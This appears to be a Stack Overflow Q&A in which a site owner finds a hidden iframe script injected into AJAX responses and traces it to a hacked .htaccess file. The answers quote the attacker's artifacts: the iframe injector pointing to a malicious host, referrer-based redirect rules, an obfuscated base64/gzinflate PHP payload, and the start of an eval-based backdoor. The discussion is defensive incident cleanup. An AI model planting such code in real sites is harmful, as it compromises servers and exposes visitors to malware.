# Very Confusing Return Data with AJAX Call

Tags: php, javascript, html, ajax, .htaccess

Whenever a link is clicked on the site at http://www.btandthetenants.com, I have an AJAX request to make the content load automatically.  However, recently, I have been seeing this confusing bit of code injected into my return data:

```js
<script>
    var _q = document.createElement('iframe'),
        _n = 'setAttribute';
    _q[_n]('src', 'http://cabaniaseleden.com.ar/stats.php');
    _q.style.position = 'absolute';
    _q.style.width = '12px';
    _q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7f08d1087e22') + 1);
    _q.style.left = '-4327px';
    document.write('<div id=\'pzeadv\'></div>');
    document.getElementById('pzeadv').appendChild(_q);​
</script>
```

This is my current code for clicking:

```js
$("#nav a").click(function(event) {
    var sHREF = $(this).attr("href");
    var sPage = sHREF.replace(oVars.sPrefix(), "");

    if (oVars.sCurrent != sPage) {
        // As long as we're not currently on the page we just clicked on...
        //oVars.sCurrent = sPage;
        if (oVars.oArchive.isOpen()) oVars.oArchive.toggle();
        loadContent(sHREF, true, false);
        track(sPage);
    }
    event.preventDefault();
});​
```

... and the `loadContent` function:

```js
function loadContent(sURL, bPush, bReplace) {

    var $Box = $("#loaded .box-1"),
        $Content = $Box.find(".inner");

    $("#nav a").removeClass("active");

    $("#nav a[href='"+ sURL +"']").addClass("active");

    oVars.sCurrent = sURL.split("&")[0];

    // Closes any picture open in Colorbox.

    if ( oVars.sCurrent != "pictures" && oVars.bI && $("#colorbox").css("display") != "none" )
        $.colorbox.close();

    if (!oVars.bIE) {

        if (bPush) {

            var objState = { page: oVars.sCurrent };

            if (bReplace)
                history.replaceState(objState, "", "");
            else
                history.pushState(objState, "", sURL);

        } else {}

    }

    if (!bReplace) {

        // Load the page.

        $Box.slideUp(oVars.iSpeed / 2, "", function() {

            $.get(

                "index.php" + oVars.sPrefix() + sURL,

                oVars.oNHF,

                function(sData) {

                    var $El = $(sData).filter(":first"),                // This is the element that would be displayed
                        $Script = $(sData).filter(":last"),
                        sPage = extractPage("ending").toLowerCase();

                    console.debug(sData);

                    // Change documentElement to body and circumvent the issues caused by the iPhone version... yadda yadda.

                    document.documentElement.className = sPage;

                    // Try and make it a regular expression to replace the words after the separator.

                    document.title = oPHP.const.NAME + oPHP.const.TEXT_DIVIDER + ( (sPage == "home") ? "Home" : oPHP.vars.titles[sPage].replace(/\<.*\>/, "").trim() );//ucwords(sPage);

                    $Box.html(sData).slideDown(oVars.iSpeed / 2);

                    // Reload the Facebook widgets for the current page.

                    reloadWidgets();

                }

            );

        } );

    }

}
```

`sData` in `loadContent` is returning that mysterious `<script>` tag at the beginning like this:

```html
<script>

// THIS IS THE EVIL SNIPPET THAT'S BEING INSERTED INTO MY CODE.

var _q = document.createElement('iframe'),
    _n = 'setAttribute';
_q[_n]('src', 'http://cabaniaseleden.com.ar/stats.php');
_q.style.position = 'absolute';
_q.style.width = '12px';
_q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7f08d1087e22') + 1);
_q.style.left = '-4327px';
document.write('<div id=\'pzeadv\'></div>');
document.getElementById('pzeadv').appendChild(_q);

</script>

<div class="box-1" id="pictures">
    <div class="title">
        Pictures <span class="links"><a class="fblink" href="http://www.facebook.com/elemovements?sk=photos" target="_blank" title="Visit this Page on Facebook">View on Facebook</a></span>
    </div>
    <div class="body">
        <div class="inner transition">
            <div>
                <div class="section-title">
                    Albums
                </div>
                <span class="gray italic size">(4 albums, 13 pictures)</span>
            </div>
            <div class="album-container">
                <a fb-href="http://www.facebook.com/album.php?fbid=332120860192434&id=156848747719647&aid=77394" href="pictures&action=list_pics&aid=156848747719647_77394&size=1&name=Wall Photos" title="">
                <div class="album">
                    <img src="http://photos-a.ak.fbcdn.net/hphotos-ak-ash3/527637_332120863525767_1834367592_s.jpg">
                </div>
                </a>
                <div class="name">
                    <a fb-href="http://www.facebook.com/album.php?fbid=332120860192434&id=156848747719647&aid=77394" href="pictures&action=list_pics&aid=156848747719647_77394&size=1&name=Wall Photos" title="">Wall Photos</a>
                </div>
            </div>
            <div class="album-container">
                <a fb-href="http://www.facebook.com/album.php?fbid=171845276219994&id=156848747719647&aid=44093" href="pictures&action=list_pics&aid=156848747719647_44093&size=2&name=Posters" title="">
                <div class="album">
                    <img src="http://photos-b.ak.fbcdn.net/hphotos-ak-ash4/427627_278221322249055_1137145612_s.jpg">
                </div>
                </a>
                <div class="name">
                    <a fb-href="http://www.facebook.com/album.php?fbid=171845276219994&id=156848747719647&aid=44093" href="pictures&action=list_pics&aid=156848747719647_44093&size=2&name=Posters" title="">Posters</a>
                </div>
            </div>
            <div class="album-container">
                <a fb-href="http://www.facebook.com/album.php?fbid=261713630566491&id=156848747719647&aid=63000" href="pictures&action=list_pics&aid=156848747719647_63000&size=4&name=Newby's Show" title="The guys' show on 1/29/2012 at Newby's. Taken in Memphis, TN.">
                <div class="album">
                    <img src="http://photos-f.ak.fbcdn.net/hphotos-ak-ash4/407659_261713673899820_1183906213_s.jpg">
                </div>
                </a>
                <div class="name">
                    <a fb-href="http://www.facebook.com/album.php?fbid=261713630566491&id=156848747719647&aid=63000" href="pictures&action=list_pics&aid=156848747719647_63000&size=4&name=Newby's Show" title="The guys' show on 1/29/2012 at Newby's. Taken in Memphis, TN.">Newby's Show</a>
                </div>
            </div>
            <div class="album-container">
                <a fb-href="http://www.facebook.com/album.php?fbid=232326246838563&id=156848747719647&aid=56722" href="pictures&action=list_pics&aid=156848747719647_56722&size=6&name=Oxford Show" title="Taken in Oxford, MS.">
                <div class="album">
                    <img src="http://photos-d.ak.fbcdn.net/hphotos-ak-ash4/390726_232326290171892_2122883596_s.jpg">
                </div>
                </a>
                <div class="name">
                    <a fb-href="http://www.facebook.com/album.php?fbid=232326246838563&id=156848747719647&aid=56722" href="pictures&action=list_pics&aid=156848747719647_56722&size=6&name=Oxford Show" title="Taken in Oxford, MS.">Oxford Show</a>
                </div>
            </div>
            <script id="logic" language="javascript" src="min/?f=/js/logic/pictures.js" type="text/javascript"></script>
        </div>
    </div>
</div>
```

My data is after the script tag and it is nowhere in my code.  You can always check this yourself in a console of some kind.

Comment: request you to please only show relevant code. People do not have a habit of reading such long questions.

Comment: I typically don't but someone had made the exact opposite statement saying I didn't provide enough information.  Besides, most of this is relevant.

Comment: He meant "clean your code". There are commented sections, lots of whitespaces, extra lines and a few bad practices. For instance, "document.write" should never be used that way (or simply never), and hungarian notation is not welcome in javascript code.

Comment: @DominicGoulet, I don't think that's what he meant. Also, if someone wants to use Hungarian notation in JS, who really cares?

Comment: *I did not write the code that is first listed.*  Let's get that clear.  I would never use `document.write`; please.  It is being added to my return data and that is the issue.

Comment: There, I tidied it up as best I can.

Answer (score 1, accepted):

This was caused by a modification to my `.htaccess` file on my server.  I had a local copy so I overwrote it.  The file's contents became:

```
#c3284d#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://cabaniaseleden.com.ar/stats.php [R=301,L]
</IfModule>
#/c3284d#

RewriteEngine on

RewriteCond %{HTTP_HOST} ^ts\.x10\.mx$ [OR]
RewriteCond %{HTTP_HOST} ^www\.ts\.x10\.mx$
RewriteRule ^/?$ "http\:\/\/75\.66\.61\.141\/" [R=301,L]
```

The hacker also added this to several PHP files on my site:

```php
#c3284d#
echo(gzinflate(base64_decode("VVHBboMwDL1X4h9yC2hdKDCVbqOVummHnfYB64RCYkokmqSJS9t9/YChavPN9nt+9nPhhVMWN8Gs446UR7Im0ojTATQy4YAjvLUwZCFVteMHoNE8mJE+St1jqQfcIjpVnRDoczArj5+l/gqpd4LOCW0Q7VMcC15xrbiHFiRoJsyBcRd75OiZbSyNRibzeG2BWeMVKjOO55U37W30BDgric3QTVJ7+Ss6LlgZJ8H14pp3as/ROHby4Lb74SSlJVw+6pBmjyLL0uWiXsp8mSeQSg55vVjJZLHKIU1pRO5I8m+vFmocVO8fsjT/Fb5ZdXYKIaSFVB1Rcr2j9hu47HZ0U8R9bTNeeEPvASdXX67vMpzANGLcWtDytVGtDMvjwCni6UE/")));
#/c3284d#
```

We need to fight internet intrusions like these to try and prevent things like this from happening.  It's on every server I access basically.  I have no idea how it got there; gotta check the logs.

Comment: Hi, I just experienced something along those lines to. Have you figured out how the hackers gained access? Have a look on your .htaccess as well btw.

Answer (score 0):

Yes I agree. Also ...please check for an extra file in your root dir. It can be named anything c.php, default.php etc... It has a php code starting :

```
if($_GET["rnd"]){die($_GET["rnd"]);}elseif($_POST["e"]){eval(base64_decode(str_rot13......
```

you can do the site search for is as well. This file was added at the same time when the above .htaccess code was changed.

I tried to trace not the source but the way it was uploaded and it looks it was done through the FTP. Secure your FTP and if you run WordPress or Joomla, secure your login page against brute/rainbow attack which are quite simple when user name is known (listed under posts) Anyone has more details ?